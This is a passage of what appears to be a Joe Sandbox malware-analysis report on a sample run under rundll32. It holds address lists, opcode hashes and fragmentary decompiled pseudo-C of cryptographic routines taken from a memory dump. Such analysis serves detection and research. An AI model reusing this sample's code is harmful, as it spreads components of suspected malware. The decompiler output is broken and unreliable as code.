                                        0x21ef30922b1
                                        0x21ef30922b5
                                        0x21ef30922bb
                                        0x21ef30922c8
                                        0x21ef30922cb
                                        0x21ef30922cf
                                        0x21ef30922d2
                                        0x21ef30922d6
                                        0x21ef30922da
                                        0x21ef30922e8
                                        0x21ef30922ec
                                        0x21ef30922f9
                                        0x21ef3092301
                                        0x21ef3092304
                                        0x21ef309230c
                                        0x21ef3092310
                                        0x21ef3092316
                                        0x21ef309231a
                                        0x21ef3092320
                                        0x21ef3092324
                                        0x21ef3092328
                                        0x21ef3092333
                                        0x21ef3092337
                                        0x21ef3092344
                                        0x21ef3092347
                                        0x21ef309234b
                                        0x21ef309234e
                                        0x21ef3092352
                                        0x21ef309235c
                                        0x21ef3092368
                                        0x21ef3092371
                                        0x21ef309237d
                                        0x21ef3092380
                                        0x21ef3092388
                                        0x21ef309238c
                                        0x21ef3092392
                                        0x21ef3092396
                                        0x21ef309239c
                                        0x21ef309239f
                                        0x21ef30923a2
                                        0x21ef30923a6
                                        0x21ef30923af
                                        0x21ef30923b2
                                        0x21ef30923bf
                                        0x21ef30923c3
                                        0x21ef30923ca
                                        0x21ef30923da
                                        0x21ef30923e0
                                        0x21ef30923e4
                                        0x21ef30923f3
                                        0x21ef30923f6
                                        0x21ef30923fe
                                        0x21ef3092402
                                        0x21ef3092408
                                        0x21ef309240c
                                        0x21ef3092412
                                        0x21ef3092415
                                        0x21ef3092418
                                        0x21ef309241c
                                        0x21ef3092425
                                        0x21ef3092428
                                        0x21ef309242e
                                        0x21ef3092432
                                        0x21ef309243a
                                        0x21ef3092445
                                        0x21ef3092449
                                        0x21ef3092456
                                        0x21ef309245a
                                        0x21ef3092466
                                        0x21ef3092469
                                        0x21ef3092471
                                        0x21ef3092475
                                        0x21ef309247b
                                        0x21ef309247f
                                        0x21ef3092485
                                        0x21ef3092488
                                        0x21ef309248b
                                        0x21ef309248f
                                        0x21ef3092497
                                        0x21ef309249a
                                        0x21ef30924a0
                                        0x21ef30924a4
                                        0x21ef30924ac
                                        0x21ef30924bd
                                        0x21ef30924c5
                                        0x21ef30924c9
                                        0x21ef30924d6
                                        0x21ef30924de
                                        0x21ef30924e1
                                        0x21ef30924e9
                                        0x21ef30924ed
                                        0x21ef30924f3
                                        0x21ef30924f7
                                        0x21ef30924fd
                                        0x21ef3092501
                                        0x21ef3092505
                                        0x21ef3092510
                                        0x21ef3092514
                                        0x21ef3092521
                                        0x21ef3092524
                                        0x21ef3092528
                                        0x21ef309252b
                                        0x21ef309252f
                                        0x21ef3092539
                                        0x21ef3092545
                                        0x21ef309254e
                                        0x21ef309255a
                                        0x21ef309255d
                                        0x21ef3092565
                                        0x21ef3092569
                                        0x21ef309256f
                                        0x21ef3092573
                                        0x21ef3092579
                                        0x21ef309257c
                                        0x21ef309257f
                                        0x21ef3092583
                                        0x21ef309258c
                                        0x21ef309258f
                                        0x21ef309259c
                                        0x21ef30925a4
                                        0x21ef30925ab
                                        0x21ef30925b7
                                        0x21ef30925bb
                                        0x21ef30925c4
                                        0x21ef30925d0
                                        0x21ef30925d3
                                        0x21ef30925db
                                        0x21ef30925df
                                        0x21ef30925e5
                                        0x21ef30925e9
                                        0x21ef30925f9
                                        0x21ef30925fc
                                        0x21ef30925ff
                                        0x21ef3092603
                                        0x21ef309260c
                                        0x21ef309260f
                                        0x21ef3092615
                                        0x21ef3092619
                                        0x21ef309261d
                                        0x21ef309262c
                                        0x21ef3092630
                                        0x21ef3092633
                                        0x21ef3092638
                                        0x21ef3092645
                                        0x21ef309264d
                                        0x21ef3092650
                                        0x21ef3092658
                                        0x21ef309265c
                                        0x21ef3092662
                                        0x21ef3092666
                                        0x21ef309266c
                                        0x21ef309267e
                                        0x21ef3092681
                                        0x21ef3092685
                                        0x21ef3092688
                                        0x21ef3092691
                                        0x21ef3092694
                                        0x21ef309269a
                                        0x21ef309269e
                                        0x21ef30926a6
                                        0x21ef30926b1
                                        0x21ef30926b5
                                        0x21ef30926c2
                                        0x21ef30926ce
                                        0x21ef30926d1
                                        0x21ef30926d9
                                        0x21ef30926dd
                                        0x21ef30926e3
                                        0x21ef30926e7
                                        0x21ef30926ed
                                        0x21ef30926f0
                                        0x21ef30926f3
                                        0x21ef30926f7
                                        0x21ef3092700
                                        0x21ef3092703
                                        0x21ef309270a
                                        0x21ef309270e
                                        0x21ef3092716
                                        0x21ef3092721
                                        0x21ef3092725
                                        0x21ef3092732
                                        0x21ef309273a
                                        0x21ef309273d
                                        0x21ef3092745
                                        0x21ef3092749
                                        0x21ef309274f
                                        0x21ef3092753
                                        0x21ef3092759
                                        0x21ef309275d
                                        0x21ef3092761
                                        0x21ef3092769
                                        0x21ef3092772
                                        0x21ef309277d
                                        0x21ef3092780
                                        0x21ef3092784
                                        0x21ef3092787
                                        0x21ef309278b
                                        0x21ef3092792
                                        0x21ef309279d
                                        0x21ef30927a1
                                        0x21ef30927b3
                                        0x21ef30927c6
                                        0x21ef30927d0
                                        0x21ef30927d4
                                        0x21ef30927da
                                        0x21ef30927de
                                        0x21ef30927e2
                                        0x21ef30927e6
                                        0x21ef30927ee
                                        0x21ef30927fb

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4056b1a2c901d1bfe87e97da8624aa0d408a94dc0d4f487b42219b868c000c0
                                        • Instruction ID: f7a4b52753d3a3bba685475803956dfc284bff06b3a1a63c75c567e11e3669c7
                                        • Opcode Fuzzy Hash: a4056b1a2c901d1bfe87e97da8624aa0d408a94dc0d4f487b42219b868c000c0
                                        • Instruction Fuzzy Hash: CB0206A174179897CF18CFC7E555AD8A79AE3ACFC4B85A027EE0E57754EA38C681C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3053370 Relevance: .5, Instructions: 512COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E0000021E21EF3053370() {
				signed int _t49;
				intOrPtr _t51;
				signed int _t65;
				signed int _t66;
				void* _t76;
				signed long long _t77;
				signed char* _t80;
				long long _t81;
				void* _t85;
				long long _t87;
				void* _t89;
				void* _t90;
				signed long long _t91;
				void* _t92;
				signed char* _t93;
				void* _t98;
				long long _t99;

				_t89 = _t90 - 0xf;
				E0000021E21EF310C220();
				_t91 = _t90 - _t76;
				_t77 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t89 - 9) = _t77 ^ _t91;
				r12d = _t92 + 7;
				r15d = r9d;
				r9d = r8d;
				r12d = r12d >> 3;
				 *((long long*)(_t89 - 0x49)) =  *((intOrPtr*)(_t89 + 0x6f));
				_t80 =  *((intOrPtr*)(_t89 + 0x77));
				 *(_t89 - 0x21) = _t80;
				 *(_t89 - 0x59) = r8d;
				 *((long long*)(_t89 - 0x41)) =  *((intOrPtr*)(_t89 + 0x5f));
				 *((long long*)(_t89 - 0x39)) =  *((intOrPtr*)(_t89 + 0x67));
				 *(_t89 - 0x4d) = r12d;
				if (r8d - 0x40 > 0) goto 0xf3053b5c;
				_t93 =  &(_t80[1]);
				 *((long long*)(_t91 + 0xd0)) = _t81;
				 *((long long*)(_t91 + 0x98)) = _t87;
				 *((long long*)(_t91 + 0x90)) = _t99;
				 *(_t89 - 0x31) = _t93;
				if ( *((intOrPtr*)(_t89 + 0x7f)) == 0) goto 0xf305378f;
				if (r15d - r12d < 0) goto 0xf3053b08;
				asm("cdq");
				_t66 = _t65 & 0x00000007;
				_t49 = r9d + _t66;
				_t51 = (_t49 & 0x00000007) - _t66;
				 *(_t89 - 0x65) = _t49 >> 3;
				 *((intOrPtr*)(_t89 - 0x69)) = _t51;
				 *((intOrPtr*)(_t89 - 0x6d)) = 8 - _t51;
				 *(_t89 - 0x61) =  *_t80 & 0x000000ff | ( *_t93 & 0x000000ff) << 0x00000008 | (_t93[1] & 0x000000ff) << 0x00000010 | (_t93[2] & 0x000000ff) << 0x00000018;
				 *(_t89 - 0x5d) = _t93[3] & 0x000000ff | (_t93[4] & 0x000000ff) << 0x00000008 | ((_t80[7] & 0x000000ff) << 0x00000008 | _t93[5] & 0x000000ff) << 0x00000010;
				r15d = r15d - r12d;
				E0000021E21EF3051A00(r15d - r12d, _t80, _t81, _t89 - 0x61,  *((intOrPtr*)(_t89 + 0x5f)), _t85,  *((intOrPtr*)(_t89 + 0x67)),  *((intOrPtr*)(_t89 - 0x49)));
				r9d = r12d;
				r10d = _t98 - 1;
				r8d = 0;
				if (r10d - 7 > 0) goto 0xf3053521;
				goto __rcx;
			}




















                                        0x21ef3053379
                                        0x21ef3053383
                                        0x21ef3053388
                                        0x21ef305338b
                                        0x21ef3053395
                                        0x21ef305339d
                                        0x21ef30533a5
                                        0x21ef30533ac
                                        0x21ef30533af
                                        0x21ef30533b6
                                        0x21ef30533bd
                                        0x21ef30533c1
                                        0x21ef30533c5
                                        0x21ef30533c9
                                        0x21ef30533cd
                                        0x21ef30533d1
                                        0x21ef30533d9
                                        0x21ef30533e3
                                        0x21ef30533e7
                                        0x21ef30533f4
                                        0x21ef3053415
                                        0x21ef3053427
                                        0x21ef3053445
                                        0x21ef305344e
                                        0x21ef305345e
                                        0x21ef305345f
                                        0x21ef3053462
                                        0x21ef305346c
                                        0x21ef305346e
                                        0x21ef3053478
                                        0x21ef305347b
                                        0x21ef305348b
                                        0x21ef3053491
                                        0x21ef3053494
                                        0x21ef3053497
                                        0x21ef305349c
                                        0x21ef305349f
                                        0x21ef30534a7
                                        0x21ef30534b0
                                        0x21ef30534bd

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c3d8c2568b9301477b20efd280f597c6b4e841771baa333af57d695db086eb8
                                        • Instruction ID: aad48d4f0c120ac3e426d2d621ad97db6ae8d18c0593651792bb9b8b9731c238
                                        • Opcode Fuzzy Hash: 8c3d8c2568b9301477b20efd280f597c6b4e841771baa333af57d695db086eb8
                                        • Instruction Fuzzy Hash: EE12F363B192D08EF756C7BD48502FD3FF29362389705058ADE89A7F8AC538861AD760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3054F60 Relevance: .4, Instructions: 414COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 52%
                                        			E0000021E21EF3054F60() {
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				signed char* _t162;
				signed long long _t163;
				long long _t166;
				intOrPtr* _t167;
				signed char* _t169;
				intOrPtr* _t172;
				signed char* _t173;
				signed char* _t174;
				signed int _t177;
				void* _t179;
				signed char* _t182;
				void* _t185;
				void* _t186;
				signed int _t187;
				unsigned int _t188;
				void* _t191;
				signed char* _t193;

				 *((long long*)(_t185 + 8)) = _t166;
				 *((long long*)(_t185 + 0x20)) = _t188;
				_push(_t179);
				_push(_t191);
				E0000021E21EF310C220();
				_t186 = _t185 - _t161;
				_t162 =  *(_t186 + 0xa8);
				_t182 = _t169;
				r12d = _t162[4] & 0x000000ff;
				_t167 = _t172;
				_t173 =  &(_t162[1]);
				r13d = r8d;
				r11d =  *_t162 & 0x000000ff;
				r11d = r11d | ( *_t173 & 0x000000ff) << 0x00000008;
				r11d = r11d | (_t173[1] & 0x000000ff) << 0x00000010;
				r11d = r11d | (_t173[2] & 0x000000ff) << 0x00000018;
				r12d = r12d | (_t173[4] & 0x000000ff) << 0x00000008;
				 *(_t186 + 0xa8) = r11d;
				_t163 =  *(_t186 + 0xb0);
				r8d =  *(_t163 + 4) & 0x000000ff;
				_t174 = _t163 + 1;
				r12d = r12d | ((_t162[7] & 0x000000ff) << 0x00000008 | _t173[5] & 0x000000ff) << 0x00000010;
				r15d =  *_t163 & 0x000000ff;
				r15d = r15d | ( *_t174 & 0x000000ff) << 0x00000008;
				r15d = r15d | (_t174[1] & 0x000000ff) << 0x00000010;
				 *(_t186 + 0x20) = r12d;
				r15d = r15d | (_t174[2] & 0x000000ff) << 0x00000018;
				r8d = r8d | (_t174[4] & 0x000000ff) << 0x00000008;
				 *(_t186 + 0xb0) = r15d;
				r8d = r8d | ((_t174[6] & 0x000000ff) << 0x00000008 | _t174[5] & 0x000000ff) << 0x00000010;
				 *(_t186 + 0x90) = r8d;
				if ( *((intOrPtr*)(_t186 + 0xb8)) == 0) goto 0xf3055312;
				_t193 =  *((intOrPtr*)(_t186 + 0xa0));
				_t177 =  &(_t193[1]);
				r9d =  *(_t177 + 3) & 0x000000ff;
				r8d =  *_t193 & 0x000000ff;
				r13d =  *(_t186 + 0x90);
				r8d = r8d | (_t193[1] & 0x000000ff) << 0x00000008;
				r8d = r8d | ( *(_t177 + 1) & 0x000000ff) << 0x00000010;
				 *(_t186 + 0xb0) = _t177;
				r8d = r8d | ( *(_t177 + 2) & 0x000000ff) << 0x00000018;
				r9d = r9d | ( *(_t177 + 4) & 0x000000ff) << 0x00000008;
				r9d = r9d | (( *(_t177 + 6) & 0x000000ff) << 0x00000008 |  *(_t177 + 5) & 0x000000ff) << 0x00000010;
				_t158 = _t191 - 8;
				if (_t158 < 0) goto 0xf30551d2;
				r14d = _t179 + 8;
				 *((intOrPtr*)(_t186 + 0xb8)) = _t179 + _t163 * 8;
				asm("o16 nop [eax+eax]");
				r8d = 1;
				 *(_t186 + 0x28) = ( *_t182 & 0x000000ff | (_t182[1] & 0x000000ff) << 0x00000008 | (_t182[2] & 0x000000ff) << 0x00000010 | (_t182[3] & 0x000000ff) << 0x00000018) ^ r8d ^ r11d;
				 *(_t186 + 0x2c) = (_t182[4] & 0x000000ff | (_t182[5] & 0x000000ff) << 0x00000008 | (_t182[6] & 0x000000ff) << 0x00000010 | (_t182[7] & 0x000000ff) << 0x00000018) ^ r9d ^ r12d;
				E0000021E21EF304F380(_t163, _t167, _t186 + 0x28,  *((intOrPtr*)(_t186 + 0x98)), _t177,  *((intOrPtr*)(_t186 + 0x98)), _t187, _t188);
				r8d =  *(_t186 + 0x28);
				r9d =  *(_t186 + 0x2c);
				r8d = r8d ^ r15d;
				 *_t167 = r8b;
				r9d = r9d ^ r13d;
				 *((char*)(_t167 + 1)) = r8d >> 8;
				 *((char*)(_t167 + 2)) = r8d >> 0x10;
				 *((char*)(_t167 + 3)) = r8d >> 0x18;
				 *((intOrPtr*)(_t167 + 4)) = r9b;
				 *((char*)(_t167 + 5)) = r9d >> 8;
				 *((char*)(_t167 + 6)) = r9d >> 0x10;
				 *((char*)(_t167 + 7)) = r9d >> 0x18;
				if (_t158 != 0) goto 0xf30550f0;
				_t155 =  *((intOrPtr*)(_t186 + 0xb8));
				r11d =  *(_t186 + 0xa8);
				if (_t155 == 0xfffffff8) goto 0xf30552d3;
				if (_t155 + 7 - 7 > 0) goto 0xf305525a;
				goto __rax;
			}























                                        0x21ef3054f60
                                        0x21ef3054f65
                                        0x21ef3054f6b
                                        0x21ef3054f6f
                                        0x21ef3054f7a
                                        0x21ef3054f7f
                                        0x21ef3054f82
                                        0x21ef3054f8a
                                        0x21ef3054f8d
                                        0x21ef3054f92
                                        0x21ef3054f99
                                        0x21ef3054fa0
                                        0x21ef3054fa3
                                        0x21ef3054fad
                                        0x21ef3054fb7
                                        0x21ef3054fc1
                                        0x21ef3054fcb
                                        0x21ef3054fce
                                        0x21ef3054fdc
                                        0x21ef3054fe4
                                        0x21ef3054fe9
                                        0x21ef3054ff0
                                        0x21ef3054ff7
                                        0x21ef3055001
                                        0x21ef305500e
                                        0x21ef3055011
                                        0x21ef305501d
                                        0x21ef3055027
                                        0x21ef305502a
                                        0x21ef305503b
                                        0x21ef3055046
                                        0x21ef305504e
                                        0x21ef3055054
                                        0x21ef3055065
                                        0x21ef3055069
                                        0x21ef3055072
                                        0x21ef3055076
                                        0x21ef3055081
                                        0x21ef305508e
                                        0x21ef3055091
                                        0x21ef30550a0
                                        0x21ef30550aa
                                        0x21ef30550b6
                                        0x21ef30550b9
                                        0x21ef30550bb
                                        0x21ef30550c1
                                        0x21ef30550d4
                                        0x21ef30550e7
                                        0x21ef3055125
                                        0x21ef3055130
                                        0x21ef305514a
                                        0x21ef3055153
                                        0x21ef3055158
                                        0x21ef305515d
                                        0x21ef3055162
                                        0x21ef3055165
                                        0x21ef3055168
                                        0x21ef3055171
                                        0x21ef305517a
                                        0x21ef3055183
                                        0x21ef305518c
                                        0x21ef3055190
                                        0x21ef3055199
                                        0x21ef30551a2
                                        0x21ef30551ad
                                        0x21ef30551bb
                                        0x21ef30551c2
                                        0x21ef30551d5
                                        0x21ef30551ee
                                        0x21ef3055205

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f2a4e4454929fdb0470fcdd18b29ad4dc6a33732055ffca6865378b8e7cc1b4
                                        • Instruction ID: 5ce53353cc56abc6dc51cfba3992d31c1ffa5e7925f079bdcfe738f0e5d593f6
                                        • Opcode Fuzzy Hash: 0f2a4e4454929fdb0470fcdd18b29ad4dc6a33732055ffca6865378b8e7cc1b4
                                        • Instruction Fuzzy Hash: 27F1E4636182E04EE325CB3D58106AEBFE0E396789F49C256EBD587B46C63CC615CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30520E0 Relevance: .4, Instructions: 373COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0000021E21EF30520E0() {
				signed int _t36;
				intOrPtr _t38;
				signed int _t60;
				signed int _t61;
				void* _t71;
				signed long long _t72;
				long long _t77;
				long long _t80;
				long long _t84;
				void* _t85;
				void* _t86;
				signed long long _t87;
				signed char* _t88;
				signed char* _t89;
				unsigned int _t90;
				long long _t92;
				long long _t94;

				_t85 = _t86 - 0x1f;
				E0000021E21EF310C220();
				_t87 = _t86 - _t71;
				_t72 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t85 - 1) = _t72 ^ _t87;
				 *((long long*)(_t85 - 0x31)) =  *((intOrPtr*)(_t85 + 0x6f));
				r12d = r9d;
				_t90 = r8d;
				_t88 =  *((intOrPtr*)(_t85 + 0x77));
				asm("cdq");
				 *(_t85 - 0x19) = _t88;
				_t61 = _t60 & 0x00000007;
				_t36 = r9d + _t61;
				r15d = _t36;
				_t38 = (_t36 & 0x00000007) - _t61;
				r15d = r15d >> 3;
				r11d = _t38;
				 *((intOrPtr*)(_t85 - 0x3d)) = _t38;
				 *(_t85 - 0x51) = r15d;
				asm("cdq");
				if (_t90 - 1 - 0x3f > 0) goto 0xf305275d;
				 *((long long*)(_t87 + 0xc0)) = _t84;
				 *((long long*)(_t87 + 0x88)) = _t92;
				 *((long long*)(_t87 + 0x80)) = _t94;
				r14d =  *_t88 & 0x000000ff;
				_t89 =  &(_t88[1]);
				r14d = r14d | (_t88[1] & 0x000000ff) << 0x00000008;
				 *(_t85 - 0x21) = _t89;
				 *((long long*)(_t85 - 0x29)) = _t90;
				r14d = r14d | (_t89[1] & 0x000000ff) << 0x00000010;
				r14d = r14d | (_t88[3] & 0x000000ff) << 0x00000018;
				if ( *((intOrPtr*)(_t85 + 0x7f)) == 0) goto 0xf3052464;
				if (r12d - r10d < 0) goto 0xf3052706;
				 *((intOrPtr*)(_t85 - 0x4d)) = 8 - r11d;
				asm("o16 nop [eax+eax]");
				r8d = 1;
				 *(_t85 - 0x49) = r14d;
				r12d = r12d - r10d;
				 *(_t85 - 0x45) = _t88[4] & 0x000000ff | (_t89[4] & 0x000000ff) << 0x00000008 | ((_t89[6] & 0x000000ff) << 0x00000008 | _t89[5] & 0x000000ff) << 0x00000010;
				E0000021E21EF304F380( *((intOrPtr*)(_t85 + 0x6f)), _t80, _t85 - 0x49,  *((intOrPtr*)(_t85 - 0x31)), _t77, _t84, _t89, _t90);
				r8d = 0;
				r9d = (_t90 + 7 + (_t61 & 0x00000007) >> 3) - 1;
				r10d = r13d;
				if (r9d - 7 > 0) goto 0xf305229d;
				goto __rcx;
			}




















                                        0x21ef30520e8
                                        0x21ef30520f2
                                        0x21ef30520f7
                                        0x21ef30520fa
                                        0x21ef3052104
                                        0x21ef305210f
                                        0x21ef3052113
                                        0x21ef3052116
                                        0x21ef305211c
                                        0x21ef3052123
                                        0x21ef3052124
                                        0x21ef3052128
                                        0x21ef305212b
                                        0x21ef3052131
                                        0x21ef3052137
                                        0x21ef3052139
                                        0x21ef305213d
                                        0x21ef3052140
                                        0x21ef3052147
                                        0x21ef305214b
                                        0x21ef305215a
                                        0x21ef305216d
                                        0x21ef305217d
                                        0x21ef3052188
                                        0x21ef3052190
                                        0x21ef3052194
                                        0x21ef3052197
                                        0x21ef305219a
                                        0x21ef305219e
                                        0x21ef30521aa
                                        0x21ef30521b2
                                        0x21ef30521d2
                                        0x21ef30521db
                                        0x21ef30521f0
                                        0x21ef30521f7
                                        0x21ef3052208
                                        0x21ef305220e
                                        0x21ef3052212
                                        0x21ef3052215
                                        0x21ef3052218
                                        0x21ef305221d
                                        0x21ef3052220
                                        0x21ef3052229
                                        0x21ef3052230
                                        0x21ef3052240

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00af9cba418553f47e4c48ebe70a102cb1717491fa15dca13acfad9a500ac6ff
                                        • Instruction ID: bf873b8df6bff11c5aff8cf805956d3c50da6b6c1751898e4cded58344d0277d
                                        • Opcode Fuzzy Hash: 00af9cba418553f47e4c48ebe70a102cb1717491fa15dca13acfad9a500ac6ff
                                        • Instruction Fuzzy Hash: 55E10A33B181A08EEB158B7998902FD3FB2F76238DB054146DE9923F89C53D860EDB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305D6F0 Relevance: .4, Instructions: 359COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5921c665f5c3b5d8862c264280056fea5a07f520c1c9bb8358a102d364e7bab1
                                        • Instruction ID: 8c5af7b4ddb12fae1b8a60b3bc65ec2353f9b66a83930535a0dccd8199d7797e
                                        • Opcode Fuzzy Hash: 5921c665f5c3b5d8862c264280056fea5a07f520c1c9bb8358a102d364e7bab1
                                        • Instruction Fuzzy Hash: BEE1D1733206608BE758CF28D859B7D37E1E799301F82902AEB15C7B85DA3A9914CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3001550 Relevance: .4, Instructions: 354COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: ab5865cb1fb637fff63a1426d89b6e8ed9ba1ca4973769de1a1ef26053e96995
                                        • Instruction ID: 5496ec6eeb52a42f3673574c53ac01c32a96c55113f96b2ed2f6c52647332c83
                                        • Opcode Fuzzy Hash: ab5865cb1fb637fff63a1426d89b6e8ed9ba1ca4973769de1a1ef26053e96995
                                        • Instruction Fuzzy Hash: A1F17977600B8486EB14CF25E88839E73B5F399BA4F158226EF9957B95DF38C482C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30949C0 Relevance: .3, Instructions: 349COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 99%
                                        			E0000021E21EF30949C0(void* __eax, signed int __ecx, signed int __edx, long long __rbx, signed long long* __rcx, unsigned int* __rdx, long long __rdi, long long __rsi, signed int __r8, signed int __r10, void* __r11) {
				signed int _t70;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				void* _t132;
				void* _t136;
				void* _t148;
				void* _t158;
				void* _t170;
				void* _t179;
				void* _t186;
				signed long long _t194;
				void* _t197;
				signed long long _t201;
				signed long long _t208;
				void* _t211;
				signed long long _t213;
				signed long long _t222;
				signed long long _t229;
				void* _t233;
				void* _t236;
				signed long long _t239;
				signed long long _t240;
				signed long long _t242;
				signed long long _t243;
				signed long long _t246;
				signed long long _t247;
				void* _t249;
				signed long long _t251;
				signed long long _t252;
				void* _t254;
				signed long long _t256;
				signed long long _t257;
				signed long long _t259;
				signed long long _t260;
				signed long long _t263;
				signed long long _t264;
				void* _t266;
				signed long long _t268;
				signed long long _t269;
				signed long long _t271;
				signed long long _t272;
				void* _t279;
				void* _t290;
				long long _t298;
				void* _t300;
				unsigned long long _t302;
				signed long long _t303;
				signed long long _t305;
				void* _t307;
				signed long long _t310;
				signed long long _t312;
				unsigned long long _t314;
				void* _t316;
				signed long long _t317;
				signed long long _t319;
				void* _t321;
				signed long long _t322;
				unsigned long long _t324;
				void* _t326;
				signed long long _t329;
				signed long long _t331;
				unsigned long long _t333;
				void* _t335;
				signed long long _t336;
				unsigned long long _t338;
				signed long long _t341;
				signed long long _t345;
				signed long long _t347;
				signed long long _t349;
				signed long long _t351;
				signed long long _t356;
				signed long long _t358;
				signed long long _t360;
				signed long long _t362;
				signed long long _t364;
				signed long long _t366;
				void* _t368;
				void* _t373;
				void* _t376;

				_t371 = __r11;
				 *((long long*)(_t300 + 8)) = __rbx;
				 *((long long*)(_t300 + 0x10)) = _t298;
				 *((long long*)(_t300 + 0x18)) = __rsi;
				 *((long long*)(_t300 + 0x20)) = __rdi;
				r10d = r9d;
				_t345 =  *__rdx >> 0x20;
				r8d = r10d;
				_t302 = __r8 * _t345;
				_t303 = _t302 << 0x21;
				_t347 = _t345 * _t345 + (_t302 >> 0x1f);
				_t356 = __r10 * __r10 + _t303;
				 *__rcx = _t356;
				_t178 =  >=  ? _t347 : _t347 + 1;
				r9d = __ecx;
				_t194 =  *__rdx >> 0x20;
				r10d = __edx;
				_t239 = __rdx[2] >> 0x20;
				r8d = r10d;
				_t240 = _t239 * _t194;
				_t305 = _t303 * _t194 + _t239 * _t347;
				_t196 =  >=  ? _t240 : _t240 + 0;
				_t197 = ( >=  ? _t240 : _t240 + 0) + (_t305 >> 0x20);
				_t358 = _t356 * _t347 + (_t305 << 0x20);
				_t242 =  >=  ? _t197 : _t197 + 1;
				_t275 = _t358 + ( >=  ? _t347 : _t347 + 1);
				_t307 = _t242 + 1;
				_t132 =  >=  ? _t242 : _t307;
				_t179 = _t132;
				asm("dec eax");
				_t70 = 0 | _t179 - _t132 > 0x00000000;
				_t276 = _t358 + ( >=  ? _t347 : _t347 + 1) + _t358;
				__rcx[1] = _t358 + ( >=  ? _t347 : _t347 + 1) + _t358;
				_t308 =  >=  ? _t242 : _t307;
				_t180 = _t179 + ( >=  ? _t242 : _t307);
				_t14 = _t197 + 1; // 0x1
				r9d = r8d;
				_t289 =  >=  ? _t197 : _t14;
				_t74 = r9d;
				_t310 = __rdx[2] >> 0x20;
				_t243 = _t242 * _t310;
				_t312 = _t310 * _t310 + (_t243 >> 0x1f);
				_t349 = _t347 * _t347 + (_t243 << 0x21);
				_t199 =  >=  ? _t312 : _t312 + 1;
				_t181 = _t179 + ( >=  ? _t242 : _t307) + _t349;
				_t136 =  >=  ?  >=  ? _t312 : _t312 + 1 : ( >=  ? _t312 : _t312 + 1) + 1;
				_t290 = ( >=  ? _t197 : _t14) + _t136;
				r9d = _t70;
				r10d = _t74;
				r11d = 0;
				r11b = _t290 - _t136 > 0;
				r8d = r10d;
				_t201 =  *__rdx >> 0x20;
				_t246 = __rdx[4] >> 0x20;
				_t247 = _t246 * _t201;
				_t314 = _t312 * _t201 + _t246 * _t349;
				_t203 =  >=  ? _t247 : _t247 + 0;
				_t204 = ( >=  ? _t247 : _t247 + 0) + (_t314 >> 0x20);
				_t360 = _t358 * _t349 + (_t314 << 0x20);
				_t249 =  >=  ? ( >=  ? _t247 : _t247 + 0) + (_t314 >> 0x20) : ( >=  ? _t247 : _t247 + 0) + (_t314 >> 0x20) + 1;
				_t182 = _t179 + ( >=  ? _t242 : _t307) + _t349 + _t360;
				_t21 = _t371 + 1; // 0x1
				_t316 = _t249 + 1;
				_t142 =  >=  ? _t249 : _t316;
				_t291 = _t290 + ( >=  ? _t249 : _t316);
				_t206 =  >=  ? __r11 : _t21;
				_t183 = _t179 + ( >=  ? _t242 : _t307) + _t349 + _t360 + _t360;
				__rcx[2] = _t179 + ( >=  ? _t242 : _t307) + _t349 + _t360 + _t360;
